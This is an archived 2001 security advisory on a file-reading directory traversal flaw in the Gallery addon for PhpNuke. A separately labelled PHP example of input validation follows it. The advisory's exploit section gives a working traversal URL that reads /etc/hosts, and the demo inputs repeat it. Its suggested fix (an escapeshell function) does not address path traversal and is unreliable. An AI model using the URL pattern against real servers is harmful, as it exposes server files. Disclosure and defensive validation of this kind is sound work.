Gallery Addon for PhpNuke remote file viewing vulnerability
From: Cabezon Aurélien (aurelien.cabezon@isecurelabs.com)
Date: 11/18/01
Message-ID: <004001c16fd7$6aeb45a0$c5cf80d9@London>
From: Cabezon Aurélien <aurelien.cabezon@isecurelabs.com>
To: <bugtraq@securityfocus.com>, <vulnwatch@vulnwatch.org>
Subject: Gallery Addon for PhpNuke remote file viewing vulnerability
Date: Sun, 18 Nov 2001 03:18:26 +0100
Gallery Addon for PhpNuke remote file viewing vulnerability
Problem discovered: 18/10/2001 by Cabezon Aurélien | aurelien.cabezon@iSecureLabs.com
[1] Description
Gallery is an intuitive web based photo gallery with authenticated users and
privileged albums.
Photo management includes automatic thumbnails, resizing, rotation, etc.
Gallery is available as a Nuke 5.0 module.
Gallery Addon is vulnerable to the ../.. bug that allows remote file reading
on the web server as whatever user runs the web server.
[2] Exploit
http://www.somehost.com/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/hosts
[3] Fix
Coder has been alerted.
An easy way to fix such a vulnerability is to use the PHP included "system
escapeshell" function.
[4] Information about Gallery Addon for PhpNuke
http://www.menalto.com/projects/gallery-nuke/
Author: bharat@menalto.com
--- Cabezon Aurélien http://www.iSecureLabs.com aurelien.cabezon@iSecureLabs.
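
Added example, not part of the original post and not Gallery's or PHP-Nuke's code: one way to constrain a request parameter that selects a file to include, such as the include parameter in the URL above. The helper name resolve_include(), the ".php" suffix and the temporary demo directory are assumptions made for illustration.

```php
<?php
// Added example. resolve_include() and the demo paths are hypothetical names,
// not code from Gallery or PHP-Nuke.
function resolve_include(string $baseDir, string $name): ?string
{
    // 1. Allowlist the name's shape: this rejects '/', '\', '.', NUL bytes
    //    and URL schemes before any filesystem call is made.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $base = rtrim($base, DIRECTORY_SEPARATOR);
    // 2. Canonicalise, then confirm the result is still inside the base
    //    directory (covers symlinks that point outside it).
    $path = realpath($base . DIRECTORY_SEPARATOR . $name . '.php');
    if ($path === false || !is_file($path)) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo: a temporary module directory holding one legitimate file.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'include_demo_' . getmypid();
mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'index.php', "<?php // demo\n");

$inputs = ['index', '../../../../../../etc/hosts', 'index/../../x', "index\0", 'missing'];
foreach ($inputs as $input) {
    $resolved = resolve_include($base, $input);
    printf("%-34s %s\n", json_encode($input), $resolved === null ? 'rejected' : 'accepted');
}

unlink($base . DIRECTORY_SEPARATOR . 'index.php');
rmdir($base);
```

A caller would pass only the returned path to include and treat null as a failed request.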